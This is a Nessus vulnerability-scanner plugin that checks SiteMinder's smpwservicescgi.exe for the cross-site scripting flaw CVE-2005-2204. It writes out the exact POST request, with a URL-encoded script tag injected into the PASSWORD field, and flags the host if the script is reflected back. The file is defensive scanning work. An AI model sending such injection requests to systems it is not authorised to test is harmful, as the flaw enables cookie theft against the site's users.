#
# (C) Tenable Network Security
#
# 

if (description) {
  script_id(18670);
  script_version("$Revision: 1.4 $");

  script_bugtraq_id(14203);
  script_cve_id("CVE-2005-2204");

  name["english"] = "SiteMinder Multiple Cross-Site Scripting Vulnerabilities";
  script_name(english:name["english"]);
 
  desc["english"] = "
The remote host is running SiteMinder, an access-management solution
from Netegrity / Computer Associates. 

The installed version of SiteMinder suffers from several cross-site
scripting flaws in its 'smpwservicescgi.exe' script.  An attacker can
exploit these flaws to inject arbitrary HTML and script code into the
browsers of users of the affected application, thereby leading to
cookie theft, site mis-representation, and similar attacks. 

See also : http://lists.grok.org.uk/pipermail/full-disclosure/2005-July/034978.html
Solution : Unknown at this time.
Risk factor : Low";
  script_description(english:desc["english"]);
 
  summary["english"] = "Checks for multiple cross-site scripting vulnerabilities in SiteMinder";
  script_summary(english:summary["english"]);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2005 Tenable Network Security");

  script_dependencie("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/" + port + "/generic_xss")) exit(0);


# A simple alert.
xss = "<script>alert('" + SCRIPT_NAME + "');</script>";
# nb: the url-encoded version is what we need to pass in.
exss = "%3Cscript%3Ealert('" + SCRIPT_NAME + "')%3B%3C%2Fscript%3E";


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Check whether the script exists.
  req = http_get(item:string(dir, "/smpwservicescgi.exe"), port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does...
  if (egrep(string:res, pattern:'img alt="Logo" src=".+/siteminder_logo\\.gif')) {
    # Try to exploit one of the flaws.
    postdata = string(
      "SMAUTHREASON=0&",
      "TARGET=/&",
      "USERNAME=nessus&",
      'PASSWORD=">', exss, "&",
      "BUFFER=endl"
    );
    req = string(
      "POST ", dir, "/smpwservicescgi.exe HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if we see our XSS.
    if (xss >< res) {
      security_warning(port);
      exit(0);
    }
  }
}
